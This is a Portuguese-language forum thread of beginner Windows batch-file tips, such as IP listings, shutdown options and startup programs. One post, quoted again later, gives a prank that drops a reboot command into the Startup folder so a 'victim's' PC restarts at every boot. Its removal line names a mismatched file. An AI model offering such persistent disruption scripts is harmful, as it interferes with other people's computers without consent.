Ir para conteúdo

Featured Replies

Postado

È bem simples abra o bloco de notas e vamos brincar um pouco.

Vou dar um exemplo de como criar um arquivo .bat para que não sabe arquivos bat servem como pronpt de comandos só que ja prontos,não sei se vcs viram postei um no forum para corrigir falhas na instalaçao da ust pro nos caracteres.

Mais vamos lá:

Um comando para ver o ip da maquina.

Abra o bloco de notas copie e cole esse comando abaixo:

@echo off
title 10 Formas De Olhas O Ip
:inicio
color fc
echo 1: IPCONFIG
[B]ping[/B] -n 3 localhost>nul
ipconfig
echo.
echo 2: ARP
arp -a
echo.
echo 3: ROUTE PRINT
route print
echo.
echo 4: NETSTAT
netstat -r
echo.
echo 5:NSLOOKUP
nslookup %computername% 2
echo.
echo 6: NETSH DIAG SHOW IP
netsh diag show ip
echo.
echo 7: SYSTEMINFO
systeminfo
echo.
echo 8: WMIC NICCONFIG GET IPADDERSS
WMIC NICCONFIG GET IPADDERSS
echo.
echo 9: [B]PING[/B]
[B]ping[/B] -n 3 locahost>nul
[B]ping[/B] %computername%
echo.
echo 10: TRACERT
tracert %computername%
pause >nul
MSG * Criado Por Henrique

Agora salve com qualquer nome mais que tenha estençao .bat.

Ex: ip.bat

Pronto vc criou um arquivo bat de 2 cliques em cima dele e veja o resultado.

Postado

È bem simples abra o bloco de notas e vamos brincar um pouco.

Vou dar um exemplo de como criar um arquivo .bat para que não sabe arquivos bat servem como pronpt de comandos só que ja prontos,não sei se vcs viram postei um no forum para corrigir falhas na instalaçao da ust pro nos caracteres.

Mais vamos lá:

Um comando para ver o ip da maquina.

Abra o bloco de notas copie e cole esse comando abaixo:

@echo off

title 10 Formas De Olhas O Ip

:inicio

color fc

echo 1: IPCONFIG

ping -n 3 localhost>nul

ipconfig

echo.

echo 2: ARP

ping -n 3 localhost>nul

arp -a

echo.

echo 3: ROUTE PRINT

ping -n 3 localhost>nul

route print

echo.

echo 4: NETSTAT

ping -n 3 localhost>nul

netstat -r

echo.

echo 5:NSLOOKUP

ping -n 3 localhost>nul

nslookup %computername% 2

echo.

echo 6: NETSH DIAG SHOW IP

ping -n 3 localhost>nul

netsh diag show ip

echo.

echo 7: SYSTEMINFO

ping -n 3 localhost>nul

systeminfo

echo.

echo 8: WMIC NICCONFIG GET IPADDERSS

ping -n 3 localhost>nul

WMIC NICCONFIG GET IPADDERSS

echo.

echo 9: PING

ping -n 3 locahost>nul

ping %computername%

echo.

echo 10: TRACERT

ping -n 3 localhost>nul

tracert %computername%

pause >nul

MSG * Criado Por Henrique

Agora salve com qualquer nome mais que tenha estençao .bat.

Ex: ip.bat

Pronto vc criou um arquivo bat de 2 cliques em cima dele e veja o resultado.

Como sempre o amigo sempre postando coisas Interessantes mais uma vez amigo esta de parabenz.

Mais aqui mudando de assunto certa vez um amigo meeu sacana me mandou um arquivo de time ei acho que esse o nome ou e clock ele mandou dizendo que era uma calculadora de bb5 quando eu dei dois click meu pc desligou eu não me lembro mais como e que se faz vc concerteza sabe vlw amigo abraço

• 8 meses depois...
Postado
  • Autor

Demorei a responder mais tá ai. Toda vez q o pc ligar... vai ser desligado en 60 segundos... (t recomendo diminuir os segundos.. para não dá tempo da vitima reagir... ex: 10 segundos.. ou até mesmo 0.. ) Brincadeira não ponha 0 pois não vai ter como voltar depois. CÒDIGO echo shutdown -r -c "hahahahahaha..." -t 60 >c:\docume~1\alluse~1\menuin~1\progra~1\inicia~1\troxa.bat VACINA: del /f /q c:\docume~1\alluse~1\menuin~1\progra~1\inicia~1\salvo.bat Quando criar, crie tambem uma vacina pois so vai parar depois de clicar na vacina.

• 1 mês depois...
  • 6 meses depois...
Postado

Demorei a responder mais tá ai.

Toda vez q o pc ligar... vai ser desligado en 60 segundos... (t recomendo diminuir os segundos.. para não dá tempo da vitima reagir... ex: 10 segundos.. ou até mesmo 0.. )

Brincadeira não ponha 0 pois não vai ter como voltar depois.

CÒDIGO

echo shutdown -r -c "hahahahahaha..." -t 60 >c:\docume~1\alluse~1\menuin~1\progra~1\inicia~1\troxa.bat

VACINA:

del /f /q c:\docume~1\alluse~1\menuin~1\progra~1\inicia~1\salvo.bat

Quando criar, crie tambem uma vacina pois so vai parar depois de clicar na vacina.

Opaaa me diga?

o que poe dentro do arquivo Troxa.bat??????????

e dentro do salvo.bat??????????

Até aqui o Windows vai sozinho.

echo shutdown -r -c "hahahahahaha..." -t 60

Na vacina tambem.

e o resto??? ¬¬

se for para colocar essa linhas acima, me diga como o windows vai deletar um arquivo que esta em uso?

e outra, a vacina nao se chama troxa.bat e sim salvo.bat.

Postado

Código para desligar

Echo off

shutdown -s -t 30

se quiser pode alterar o tempo(no meu caso 30 segundos) para a contagem regressiva que quiser ou se tirar o tempo desliga automaticamente.

Código para reiniciar

Echo off

echo reiniciando o computador

shutdown -r

Outros atributos que podem ser utilizados em conjunto com o comando shutdown

shutdown [-l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment"

] [-d up:xx:yy]

Sem args Exibir esta mensagem (o mesmo que -?)

-l Exibir interface GUI; deve ser a primeira opção

-s Desligar o computador

-r Desligar e reiniciar o computador

-a Anular desligamento do sistema

-m \\computername Computador remoto a ser desligado/reiniciado/anulado

-t xx Definir tempo limite para desligamento como xx segundos

-c "comment" Comentário sobre desligamento (máximo de 127 caracteres)

-f Força o encerramento da execução de aplicativos sem avisar

-d [p]:xx:yy Código de razão para o desligamento

u é o código de usuário

p é um código de desligamento planejado

xx é o código de razão principal (número inteiro positivo menor que 256)

yy é o código de razão secundário (número inteir o positivo menor que 65536)

Mas diferente do código que o Henrique, postou esse apenas vai desligar seu computador... só vai desligar de novo quando vc der 2 cliques nele novamente

• 2 semanas depois...
  • 9 meses depois...
Postado

ei como eu crio um arquivo .bat que vai rodar toda ves que eu ligar o pc

(tipo no msn quendo vc liga o pc ele aparece?)

Amigo o primeiro arquivo em lote a ser executado é o "Autoexec.bat", se vc quizer executar alguma coisa ao ligar o computador vc tem que editar esse arquivo. Por exemplo para iniciar o messenger vc poderia usar o seguinte código:

@echo off
@echo executando messenger...
c:
cd\arquivos de programas
cd windows live
cd messenger
msnmsgr.exe
@echo messenger encerrado.

É só um exemplo, pois para fazer o messenger iniciar junto com o Windows é só configurar o próprio messenger.

Postado

Simplificando um pouco... No Windows XP, vá no menu iniciar e procure pelo sub-menu Inicializar... Dentro desse submenu, coloque um atalho de todos os programas que deseja abrir automaticamente quando ligar o windows. Mas acho desnecessário, já que isso vai influenciar na velocidade de que seu computador ligue e carregará muitos arquivos desnecessários logo ao ser ligado. Abraços

• 2 semanas depois...
  • 1 mês depois...
Postado

preciso criar um bat que altere a data do pc para 2004 e abra o programa core draw alguem pode me ajudar?

O Código seria mais ou menos assim:

@echo Off

@echo Alterando a data...

date 01/01/2004

@echo Data alterada

@echo

@echo Executando Corel

C:\Arquivos de programas\Corel\Corel.exe

@echo Fim de execução

Algumas observações:

1. É preciso ter privilégios de administrador para alterar a data, senão ira retornar erro

2. O caminho do corel poderá ser diferente, verifique e altere o caminho assim como o executável

• 3 meses depois...
Postado

È bem simples abra o bloco de notas e vamos brincar um pouco ...

Oi sou leiga no assunto e preciso de ajuda.

Eu uso o Windos XP Profissional xxx

Antes de reinstalar o sistema xxx eu conseguia verificar as redes sem fio disponíveis agora eu preciso fazer o seguinte procedimento: l

1. Clique em Iniciar (Start), clique em Executar (Run), escreva %SystemRoot%\system32\services.msc /s e clique em OK.2. Faça duplo clique em Configuração zero sem fios (Wireless xxx Zero Configuration).

3. Na lista Tipo de inicialização (Startup type), clique em Automático (Automatic) e clique em Aplicar (Apply).

4. Na área Status do serviço (Service status), clique em Iniciar (Start) e clique em OK

5.Depois clico duas vezes no ícone xxx da rede sem fio6. Vou em alterar configurações avançadas7. Na janela Propriedade de Conexão de redes sem fio.8. Na aba Redes sem fio.9 . Marco a opção usar o Windows para definir as configurações de rede sem fio.

Em outro forum eu vi que criando um .bat esse processo iniciaria junto com o sistema operacional xxx.Então como faço para criar xxx esse .bat? E em que local devo colocá-lo para ser executado?Grata desde já pela atenção.

Postado

Oi sou leiga no assunto e preciso de ajuda ...

Vc precisa editar o arquivo autoexec.bat e não criar um .bat novo, isso porque o autoexec.bat é executado junto com a inicialização do Ruindows.

Faça assim, abra o editor de notas e selecione o arquivo autoexec.bat que fica na raiz de c:, se estiver escondido vc tem que alterar as propriedades de exibição de pastas.

Arquivo aberto é só adicionar as configurações que vc quer que sejam executadas, por ex. o que vc citou:

%SystemRoot%\system32\services.msc /s

Quanto aos cliques vc vai ter que ver cada um o comando equivalente em DOS.

De uma procurada por isso pois existe muita informação na internet.

Postado

Vc precisa editar o arquivo autoexec.bat e não criar um .bat novo, isso porque o autoexec.bat é executado junto com a inicialização do Ruindows.

Faça assim, abra o editor de notas e selecione o arquivo autoexec.bat que fica na raiz de c:, se estiver escondido vc tem que alterar as propriedades de exibição de pastas.

Arquivo aberto é só adicionar as configurações que vc quer que sejam executadas, por ex. o que vc citou:

%SystemRoot%\system32\services.msc /s

Quanto aos cliques vc vai ter que ver cada um o comando equivalente em DOS.

De uma procurada por isso pois existe muita informação na internet.

Obrigada pela resposta, mas eu abri o bloco de notas selecionei o arquivo autoexec.bat e adicionei:

%windir%\system32\net.exe start wzcsvc

salvei, fechei tudo e fiz logoff, mas a rede sem fio não iniciou com o windows. O que eu fiz de errado?

• 6 meses depois...
  • 2 semanas depois...
Postado

Olá, gostaria de saber como posso colocar um comando de confirmação dessa ação, do tipo quando abrir a janela eu ter que confirmar o que será feito (Deseja que o comando seja executado? "Sim ou Não") tem como? Detalhes do comando: Aqui é um comando pra reiniciar o "Windows Explorer" [OCULTAR] @ECHO OFF echo. echo. echo ========================================== echo Script Para Reiniciar Windows Explorer echo. echo Created by "Vishal Gupta" for AskVG.com echo Adaptado por "Autor da adaptação" echo ========================================== echo. echo. echo Passo 1: Fechando Explorer . . . echo. TASKKILL /F /IM explorer.exe echo. echo. echo Passo 2: Iniciando Explorer . . . start explorer.exe echo. echo Sucesso: Windows Explorer ativado. echo. PAUSE[/OCULTAR] Mas eu pretendo fazer também para reiniciar o Windows e para desligar tbm, todos com confirmação da ação Grato pela ajuda!

• 3 semanas depois...
Postado

Boa noite pessoal preciso de ajuda para criar um arquivo.bat. Se alguém puder ajudar agradeço muito. Minha ideia é rodar em um CD um jogo e ao mesmo tempo uma música. Então ao colocar o CD no drive vai executar o jogo e ficará tocando uma música em loop. Eu consegui fazer com os seguintes comandos: start jogo.exe e start musica.wav. Mas a música roda apenas uma vez e para. Preciso que ela fique rodando em quanto o jogo estiver aberto. Obrigado.

• 2 meses depois...

Participe da conversa

Você pode postar agora e se cadastrar mais tarde. Se você tem uma conta, faça o login para postar com sua conta.
Nota: Sua postagem exigirá aprovação do moderador antes de ficar visível.

Visitante
Responder

Quem Está Navegando 0

• Nenhum usuário registrado visualizando esta página.